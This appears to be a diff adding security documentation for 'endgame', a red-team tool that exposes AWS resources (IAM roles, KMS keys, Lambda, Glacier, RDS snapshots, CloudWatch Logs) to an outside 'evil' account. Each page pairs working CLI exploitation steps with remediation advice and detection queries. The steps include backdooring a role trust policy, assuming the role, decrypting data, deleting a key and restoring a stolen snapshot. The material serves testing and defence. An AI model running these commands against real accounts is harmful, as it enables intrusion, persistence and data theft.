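# Kick off an inventory retrieval to enumerate the archives in the vault
JOB_ID=$(aws glacier initiate-job \
  --account-id $VICTIM_ACCOUNT_ID \
  --vault-name test-resource-exposure \
  --job-parameters '{"Type": "inventory-retrieval"}' \
  --query jobId --output text)

# Poll until the job completes (this can take hours)
aws glacier describe-job \
  --account-id $VICTIM_ACCOUNT_ID \
  --vault-name test-resource-exposure \
  --job-id "$JOB_ID"

# Download the vault inventory once the job is complete
aws glacier get-job-output \
  --account-id $VICTIM_ACCOUNT_ID \
  --vault-name test-resource-exposure \
  --job-id "$JOB_ID" inventory.json
```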
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Trusted Accounts Only**: Ensure that Glacier Vaults are only shared with trusted accounts, and that the trusted accounts truly need access to the Vaults.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Restrict access to IAM permissions that could lead to exposure of your Vaults**: Tightly control access to the following IAM actions:
- [glacier:GetVaultAccessPolicy](https://docs.aws.amazon.com/amazonglacier/latest/dev/api-GetVaultAccessPolicy.html): _Retrieves the access-policy subresource set on the vault_
- [glacier:ListVaults](https://docs.aws.amazon.com/amazonglacier/latest/dev/api-vaults-get.html): _Lists all vaults_
- [glacier:SetVaultAccessPolicy](https://docs.aws.amazon.com/amazonglacier/latest/dev/api-SetVaultAccessPolicy.html): _Configures an access policy for a vault and will overwrite an existing policy._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='glacier.amazonaws.com' and eventName='SetVaultAccessPolicy'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='glacier.amazonaws.com' and (eventName='SetVaultAccessPolicy' and requestParameters.policy.policy like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [set-vault-access-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/glacier/set-vault-access-policy.html)
* [get-vault-access-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/glacier/get-vault-access-policy.html)

184
docs/risks/iam-roles.md Normal file
View File

@ -0,0 +1,184 @@
# IAM Roles (via AssumeRole)
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service iam --name test-resource-exposure
```
* Alternatively, to expose the resource using the AWS CLI:
Create a file titled `Evil-Trust-Policy.json` with the following contents:
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "sts:AssumeRole"
}
]
}
```
Apply the evil Assume Role Policy by running the following from the victim account:
```bash
aws iam update-assume-role-policy --role-name test-resource-exposure --policy-document file://Evil-Trust-Policy.json
```
* To view the contents of the Assume Role Policy that grants access to the evil user, run the following:
```bash
aws iam get-role --role-name test-resource-exposure
```
* Observe that the output of the overly permissive AssumeRolePolicy matches the example shown below.
## Example
Observe that the content of the `AssumeRolePolicyDocument` key allows `sts:AssumeRole` access from the evil principal (`arn:aws:iam::999988887777:user/evil`).
```json
{
"Role": {
"Path": "/",
"RoleName": "test-resource-exposure",
"RoleId": "",
"Arn": "arn:aws:iam::111122223333:role/test-resource-exposure",
"CreateDate": "2021-02-13T19:21:51Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
},
{
"Sid": "AllowCurrentAccount",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::111122223333:root"
},
"Action": "sts:AssumeRole"
},
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "sts:AssumeRole"
}
]
},
"Tags": [
{
"Key": "Owner",
"Value": "yourmom"
}
],
"RoleLastUsed": {}
}
}
```
## Exploitation
* Set your AWS Access keys to the Evil Principal (`arn:aws:iam::999988887777:user/evil`) credentials
* Verify that you can run `sts:AssumeRole` to the victim account
```bash
aws sts assume-role --profile evil --role-arn arn:aws:iam::111122223333:role/test-resource-exposure --role-session-name HotDogsAreSandwiches
```
* The output will contain `AccessKeyId`, `SecretAccessKey`, and `SessionToken` values, as shown below. Note these values.
```
{
"Credentials": {
"AccessKeyId": "",
"SecretAccessKey": "",
"SessionToken": "",
"Expiration": "2021-02-13T21:24:46Z"
},
"AssumedRoleUser": {
"AssumedRoleId": "roleid:HotDogsAreSandwiches",
"Arn": "arn:aws:sts::111122223333:assumed-role/test-resource-exposure/HotDogsAreSandwiches"
}
}
```
* Set those values to your AWS credentials environment variables
```bash
export AWS_ACCESS_KEY_ID=outputfromAccessKeyId
export AWS_SECRET_ACCESS_KEY=outputfromSecretAccessKey
export AWS_SESSION_TOKEN=outputfromSessionToken
```
* To validate that you are leveraging the victim's credentials, run `aws sts get-caller-identity` (this API Call is the equivalent of `whoami`)
```bash
aws sts get-caller-identity
```
* Observe that the output of the call contains the Victim Account ID under `Account`, as well as an ARN that indicates you have assumed the victim role.
```
{
"UserId": "AROAblah:HotDogsAreSandwiches",
"Account": "111122223333",
"Arn": "arn:aws:sts::111122223333:assumed-role/test-resource-exposure/HotDogsAreSandwiches"
}
```
* Congratulations! You've created a backdoor role in the victim's account 😈
## Remediation
* **Trusted Accounts Only**: Ensure that IAM roles can only be assumed by trusted accounts and the trusted principals within those accounts.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Assume IAM Roles. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your IAM Roles**: Tightly control access to the following IAM actions:
- [iam:UpdateAssumeRolePolicy](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateAssumeRolePolicy.html): _Grants permission to update the policy that grants an IAM entity permission to assume a role_
- [iam:GetRole](https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetRole.html): _Grants permission to retrieve information about the specified role, including the role's path, GUID, ARN, and the role's trust policy_
- [iam:ListRoles](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ListRoles.html): _Grants permission to list the IAM roles that have the specified path prefix_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='iam.amazonaws.com' and eventName='UpdateAssumeRolePolicy'
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [update-assume-role-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/update-assume-role-policy.html)
* [Learn more about IAM cross-account trust](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_common-scenarios_aws-accounts.html)

88
docs/risks/kms.md Normal file
View File

@ -0,0 +1,88 @@
# KMS Keys
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service kms --name test-resource-exposure
```
* To view the contents of the KMS Key Policy, run the following:
```bash
export VICTIM_KEY_ARN=arn:aws:kms:us-east-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab
aws kms get-key-policy --key-id $VICTIM_KEY_ARN --policy-name default
```
* Observe that the output of the overly permissive KMS Key Policy resembles the example shown below.
## Example
Observe that the policy below allows the evil principal (`arn:aws:iam::999988887777:user/evil`) the `kms:*` permissions to the KMS Key.
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::999988887777:user/evil"
},
"Action": "kms:*",
"Resource": "arn:aws:kms:us-east-1:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab"
}
]
}
```
## Exploitation
```
TODO
```
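One possible exploitation sketch: with `kms:*` on the key, the attacker can decrypt any ciphertext protected by it (for example, data exfiltrated from an encrypted S3 object or EBS volume) and can even schedule the key for deletion. The ciphertext file below is a placeholder for data obtained elsewhere:
```bash
export VICTIM_KEY_ARN=arn:aws:kms:us-east-1:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab

# Decrypt a ciphertext that was encrypted under the victim's key
aws kms decrypt \
  --ciphertext-blob fileb://exfiltrated-ciphertext.bin \
  --output text --query Plaintext | base64 --decode

# Destructive option: schedule the key for deletion, denying the victim access to their data
aws kms schedule-key-deletion \
  --key-id $VICTIM_KEY_ARN \
  --pending-window-in-days 7
```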
## Remediation
* **Leverage Strong Resource-based Policies**: Follow the resource-based policy recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#leverage-strong-resource-based-policies)
* **Trusted Accounts Only**: Ensure that KMS Keys are only shared with trusted accounts, and that the trusted accounts truly need access to the key.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to KMS Keys. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your KMS Keys**: Tightly control access to the following IAM actions:
- [kms:PutKeyPolicy](https://docs.aws.amazon.com/kms/latest/APIReference/API_PutKeyPolicy.html): _Controls permission to replace the key policy for the specified customer master key_
- [kms:GetKeyPolicy](https://docs.aws.amazon.com/kms/latest/APIReference/API_GetKeyPolicy.html): _Controls permission to view the key policy for the specified customer master key_
- [kms:ListKeys](https://docs.aws.amazon.com/kms/latest/APIReference/API_ListKeys.html): _Controls permission to view the key ID and Amazon Resource Name (ARN) of all customer master keys in the account_
- [kms:ListAliases](https://docs.aws.amazon.com/kms/latest/APIReference/API_ListAliases.html): _Controls permission to view the aliases that are defined in the account. Aliases are optional friendly names that you can associate with customer master keys_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='kms.amazonaws.com' and eventName='PutKeyPolicy'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='kms.amazonaws.com' and (eventName='PutKeyPolicy' and requestParameters.policy like 'Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [put-key-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/put-key-policy.html)
* [get-key-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/kms/get-key-policy.html)

View File

@ -0,0 +1,118 @@
# Lambda Function Cross-Account Access
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
AWS Lambda Permission Policies (aka resource-based policies) can allow functions to be invoked from AWS accounts other than the one they are running in.
Compromised Lambda functions are a known attack path for [Privilege Escalation](https://resources.infosecinstitute.com/topic/cloudgoat-walkthrough-lambda-privilege-escalation/) and other nefarious use cases. While the impact often depends on the context of the Lambda function itself, Lambda functions often modify AWS infrastructure or have data plane access. Abusing these capabilities could compromise the confidentiality and integrity of the resources in the account.
Existing Exploitation tools such as [Pacu](https://github.com/RhinoSecurityLabs/pacu) have capabilities that help attackers exploit compromised Lambda functions. Pacu, for example, has modules that leverage Lambda functions to [backdoor new IAM roles](https://github.com/RhinoSecurityLabs/pacu/tree/master/modules/lambda__backdoor_new_roles), to [modify security groups](https://github.com/RhinoSecurityLabs/pacu/tree/master/modules/lambda__backdoor_new_sec_groups), and to [create new IAM users](https://github.com/RhinoSecurityLabs/pacu/tree/master/modules/lambda__backdoor_new_users). As such, Lambda functions are high-value targets to attackers, and existing exploitation frameworks such as Pacu and others increase the likelihood for abuse when a Lambda function is compromised.
## Steps to Reproduce
* **Option 1**: To expose the Lambda function using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service lambda --name test-resource-exposure
```
* **Option 2**: To expose the Lambda Function using AWS CLI, run the following from the victim account:
```bash
export EVIL_PRINCIPAL_ACCOUNT=999988887777
aws lambda add-permission \
--function-name test-resource-exposure \
--action lambda:* \
--statement-id Endgame \
--principal $EVIL_PRINCIPAL_ACCOUNT
```
* To view the contents of the exposed resource policy, run the following:
```bash
aws lambda get-policy --function-name test-resource-exposure
```
* Observe that the contents of the exposed resource policy match the example shown below.
## Example
```json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Endgame",
"Effect": "Allow",
"Principal": {
"AWS": "999988887777"
},
"Action": [
"lambda:*"
],
"Resource": "arn:aws:lambda:us-east-1:111122223333:test-resource-exposure"
}
]
}
```
## Exploitation
* Authenticate to the `evil` account (In this example, `arn:aws:iam::999988887777:user/evil`)
* Run the following command to invoke the function in the victim account:
```bash
export VICTIM_LAMBDA=arn:aws:lambda:us-east-1:111122223333:function:test-resource-exposure
aws lambda invoke --function-name $VICTIM_LAMBDA response.json
```
* Observe that the output resembles the following:
```json
{
"ExecutedVersion": "$LATEST",
"StatusCode": 200
}
```
## Remediation
* **Trusted Accounts Only**: Ensure that cross-account Lambda functions allow access only to trusted accounts to prevent unknown function invocation requests
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Lambda Functions. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your Lambda Functions**: Tightly control access to the following IAM actions:
- [lambda:AddPermission](https://docs.aws.amazon.com/lambda/latest/dg/API_AddPermission.html): _Grants permission to give an AWS service or another account permission to use an AWS Lambda function_
- [lambda:GetPolicy](https://docs.aws.amazon.com/lambda/latest/dg/API_GetPolicy.html): _Grants permission to view the resource-based policy for an AWS Lambda function, version, or alias_
- [lambda:InvokeFunction](https://docs.aws.amazon.com/lambda/latest/dg/API_Invoke.html): _Grants permission to invoke an AWS Lambda function_
- [lambda:ListFunctions](https://docs.aws.amazon.com/lambda/latest/dg/API_ListFunctions.html): _Grants permission to retrieve a list of AWS Lambda functions, with the version-specific configuration of each function_
- [lambda:RemovePermission](https://docs.aws.amazon.com/lambda/latest/dg/API_RemovePermission.html): _Grants permission to revoke function-use permission from an AWS service or another account_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='lambda.amazonaws.com' and eventName like 'AddPermission'
```
The following query detects policy modifications which include the default IOC string:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='lambda.amazonaws.com' and (eventName like 'AddPermission' and requestParameters.statementId='Endgame')
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
* [aws lambda add-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-permission.html)
* [Access Analyzer support for AWS Lambda Functions](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda)

View File

@ -0,0 +1,66 @@
# Lambda Layers
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service lambda-layer --name test-resource-exposure:1
```
* To view the contents of the Lambda layer policy, run the following:
```bash
export VICTIM_RESOURCE_ARN=arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure
export VERSION=1
aws lambda get-layer-version-policy \
--layer-name $VICTIM_RESOURCE_ARN \
--version-number $VERSION
```
* Observe that the output of the overly permissive Lambda Layer Policy resembles the example shown below.
## Example
Observe that the Evil principal's account ID (`999988887777`) is given `lambda:GetLayerVersion` access to the Lambda layer `arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1`.
```json
{
"Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"AllowCurrentAccount\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::111122223333:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"},{\"Sid\":\"Endgame\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":\"lambda:GetLayerVersion\",\"Resource\":\"arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure:1\"}]}",
"RevisionId": ""
}
```
## Exploitation
```
TODO
```
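One possible exploitation sketch: `lambda:GetLayerVersion` returns a pre-signed S3 URL for the layer content, so the attacker can download and inspect the layer's code and dependencies:
```bash
export VICTIM_LAYER_ARN=arn:aws:lambda:us-east-1:111122223333:layer:test-resource-exposure

# Retrieve a pre-signed URL for the layer contents
LAYER_URL=$(aws lambda get-layer-version \
  --layer-name $VICTIM_LAYER_ARN \
  --version-number 1 \
  --query Content.Location --output text)

# Download and unpack the layer for inspection
curl -s -o layer.zip "$LAYER_URL"
unzip layer.zip -d layer-contents
```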
## Remediation
* **Trusted Accounts Only**: Ensure that Lambda Layers are only shared with trusted accounts.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **AWS Access Analyzer**: Leverage AWS Access Analyzer to report on external access to Lambda Layers. See [the AWS Access Analyzer documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda) for more details.
* **Restrict access to IAM permissions that could lead to exposure of your Lambda Layers**: Tightly control access to the following IAM actions:
- [lambda:AddLayerVersionPermission](https://docs.aws.amazon.com/lambda/latest/dg/API_AddLayerVersionPermission.html): _Grants permission to add permissions to the resource-based policy of a version of an AWS Lambda layer_
- [lambda:GetLayerVersionPolicy](https://docs.aws.amazon.com/lambda/latest/dg/API_GetLayerVersionPolicy.html): _Grants permission to view the resource-based policy for a version of an AWS Lambda layer_
- [lambda:ListFunctions](https://docs.aws.amazon.com/lambda/latest/dg/API_ListFunctions.html): _Grants permission to retrieve a list of AWS Lambda functions, with the version-specific configuration of each function_
- [lambda:ListLayers](https://docs.aws.amazon.com/lambda/latest/dg/API_ListLayers.html): _Grants permission to retrieve a list of AWS Lambda layers, with details about the latest version of each layer_
- [lambda:ListLayerVersions](https://docs.aws.amazon.com/lambda/latest/dg/API_ListLayerVersions.html): _Grants permission to retrieve a list of versions of an AWS Lambda layer_
- [lambda:RemoveLayerVersionPermission](https://docs.aws.amazon.com/lambda/latest/dg/API_RemoveLayerVersionPermission.html): _Grants permission to remove a statement from the permissions policy for a version of an AWS Lambda layer_
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## References
* [aws lambda add-layer-version-permission](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/add-layer-version-permission.html)
* [aws lambda get-layer-version-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/get-layer-version-policy.html)
* [Access Analyzer support for AWS Lambda Functions](https://docs.aws.amazon.com/IAM/latest/UserGuide/access-analyzer-resources.html#access-analyzer-lambda)

66
docs/risks/logs.md Normal file
View File

@ -0,0 +1,66 @@
# CloudWatch Logs Resource Policies
CloudWatch Resource Policies allow other AWS services or IAM Principals to put log events into the account.
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service cloudwatch --name test-resource-exposure
```
* To view the contents of the exposed resource policy, run the following:
```bash
aws logs describe-resource-policies
```
* Observe that the contents of the exposed resource policy match the example shown below.
## Example
```json
{
"resourcePolicies": [
{
"policyName": "test-resource-exposure",
"policyDocument": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"\",\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::999988887777:root\"},\"Action\":[\"logs:PutLogEventsBatch\",\"logs:PutLogEvents\",\"logs:CreateLogStream\"],\"Resource\":\"arn:aws:logs:*\"}]}",
"lastUpdatedTime": 1613244111319
}
]
}
```
## Exploitation
```
TODO
```
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Trusted Accounts Only**: Ensure that CloudWatch Logs access is only shared with trusted accounts, and that the trusted accounts truly need access to write to the CloudWatch Logs.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposing write access to your CloudWatch Logs**: Tightly control access to the following IAM actions:
- [logs:PutResourcePolicy](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutResourcePolicy.html): _Creates or updates a resource policy allowing other AWS services to put log events to this account_
- [logs:DeleteResourcePolicy](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DeleteResourcePolicy.html): _Deletes a resource policy from this account. This revokes the access of the identities in that policy to put log events to this account._
- [logs:DescribeResourcePolicies](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_DescribeResourcePolicies.html): _Lists the resource policies in this account._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
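To support the recommendations above, an unexpected CloudWatch Logs resource policy can also be reviewed and removed directly; a minimal sketch:
```bash
# Review all CloudWatch Logs resource policies in the account
aws logs describe-resource-policies

# Delete the malicious or unneeded policy by name
aws logs delete-resource-policy --policy-name test-resource-exposure
```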
## References
* [CloudWatch Logs Resource Policies](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/iam-access-control-overview-cwl.html)
* [API Documentation: PutResourcePolicy](https://docs.aws.amazon.com/AmazonCloudWatchLogs/latest/APIReference/API_PutResourcePolicy.html)
* [aws logs put-resource-policy](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/logs/put-resource-policy.html)
* [aws logs describe-resource-policies](https://docs.aws.amazon.com/cli/latest/reference/logs/describe-resource-policies.html)

View File

@ -0,0 +1,85 @@
# RDS Snapshots
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
* [Remediation](#remediation)
* [Basic Detection](#basic-detection)
* [References](#references)
## Steps to Reproduce
* To expose the resource using `endgame`, run the following from the victim account:
```bash
export EVIL_PRINCIPAL=arn:aws:iam::999988887777:user/evil
endgame expose --service rds --name test-resource-exposure
```
* To view a list of the AWS Accounts that have access to the RDS DB Snapshot, run the following command from the victim account:
```bash
aws rds describe-db-snapshot-attributes \
--db-snapshot-identifier test-resource-exposure
```
## Example
* Observe that the account ID of the evil principal (`999988887777`) is listed alongside the AttributeName called `restore`. This means that the evil account ID is able to restore the snapshot of the RDS database in their own account.
```json
{
"DBSnapshotAttributesResult": {
"DBSnapshotIdentifier": "test-resource-exposure",
"DBSnapshotAttributes": [
{
"AttributeName": "restore",
"AttributeValues": [
"999988887777"
]
}
]
}
}
```
## Exploitation
After the RDS snapshot is public or shared with the rogue user account, an attacker can then:
* [copy the snapshot](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_CopySnapshot.html#USER_CopyDBSnapshot)
* [Restore a DB Instance from the DB Snapshot](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/CHAP_Tutorials.RestoringFromSnapshot.html)
* Browse the contents of the database, potentially revealing sensitive or otherwise non-public information.
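A sketch of those steps from the attacker's account. This works directly for unencrypted snapshots; snapshots encrypted with a customer-managed key additionally require access to that key, and the instance class below is a placeholder:
```bash
export VICTIM_SNAPSHOT_ARN=arn:aws:rds:us-east-1:111122223333:snapshot:test-resource-exposure

# Optionally copy the shared snapshot into the attacker's account
aws rds copy-db-snapshot \
  --source-db-snapshot-identifier $VICTIM_SNAPSHOT_ARN \
  --target-db-snapshot-identifier stolen-copy

# Restore a database instance from the shared (or copied) snapshot
aws rds restore-db-instance-from-db-snapshot \
  --db-instance-identifier stolen-db \
  --db-snapshot-identifier $VICTIM_SNAPSHOT_ARN \
  --db-instance-class db.t3.micro
```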
## Remediation
> ‼️ **Note**: At the time of this writing, AWS Access Analyzer does **NOT** support auditing of this resource type to prevent resource exposure. **We kindly suggest to the AWS Team that they support all resources that can be attacked using this tool**. 😊
* **Encrypt all Snapshots with Customer-Managed Keys**: Follow the encryption-related recommendations in the [Prevention Guide](https://endgame.readthedocs.io/en/latest/prevention/#use-aws-kms-customer-managed-keys)
* **Trusted Accounts Only**: Ensure that RDS Snapshots are only shared with trusted accounts, and that the trusted accounts truly need access to the RDS Snapshots.
* **Ensure access is necessary**: For any trusted accounts that do have access, ensure that the access is absolutely necessary.
* **Restrict access to IAM permissions that could lead to exposure of your RDS Snapshots**: Tightly control access to the following IAM actions:
- [rds:DescribeDbClusterSnapshotAttributes](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBClusterSnapshotAttributes.html): _Grants permission to return a list of DB cluster snapshot attribute names and values for a manual DB cluster snapshot. This includes information on which AWS Accounts have access to the snapshot._
- [rds:DescribeDbClusterSnapshots](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBClusterSnapshots.html): _Grants permission to return information about DB cluster snapshots._
- [rds:DescribeDbSnapshotAttributes](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBSnapshotAttributes.html): _Grants permission to return a list of DB snapshot attribute names and values for a manual DB snapshot. This includes information on which AWS Accounts have access to the snapshot._
- [rds:DescribeDbSnapshots](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBSnapshots.html): _Grants permission to return information about DB snapshots_
- [rds:ModifyDBSnapshotAttribute](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBSnapshotAttribute.html): _Grants permission to add an attribute and values to, or removes an attribute and values from, a manual DB snapshot. This includes the ability to share snapshots with other AWS Accounts._
- [rds:ModifyDBClusterSnapshotAttribute](https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBClusterSnapshotAttribute.html): _Grants permission to add an attribute and values to, or removes an attribute and values from, a manual DB cluster snapshot. This includes the ability to share snapshots with other AWS Accounts._
Also, consider using [Cloudsplaining](https://github.com/salesforce/cloudsplaining/#cloudsplaining) to identify violations of least privilege in IAM policies. This can help limit the IAM principals that have access to the actions that could perform Resource Exposure activities. See the example report [here](https://opensource.salesforce.com/cloudsplaining/)
## Basic Detection
The following CloudWatch Log Insights query will include exposure actions taken by endgame:
```
fields eventTime, eventSource, eventName, userIdentity.arn, userAgent
| filter eventSource='rds.amazonaws.com' AND (eventName='ModifyDBSnapshotAttribute' or eventName='ModifyDBClusterSnapshotAttribute') and requestParameters.attributeName='restore'
```
This query assumes that your CloudTrail logs are being sent to CloudWatch and that you have selected the correct log group.
## References
- [aws rds modify-db-cluster-snapshot-attribute](https://docs.aws.amazon.com/cli/latest/reference/rds/modify-db-cluster-snapshot-attribute.html)
- [aws rds modify-db-snapshot-attribute](https://docs.aws.amazon.com/cli/latest/reference/rds/modify-db-snapshot-attribute.html)
- [aws rds describe-db-snapshot-attributes](https://docs.aws.amazon.com/cli/latest/reference/rds/describe-db-snapshot-attributes.html)

77
docs/risks/s3.md Normal file
View File

@ -0,0 +1,77 @@
# S3 Buckets
* [Steps to Reproduce](#steps-to-reproduce)
* [Exploitation](#exploitation)
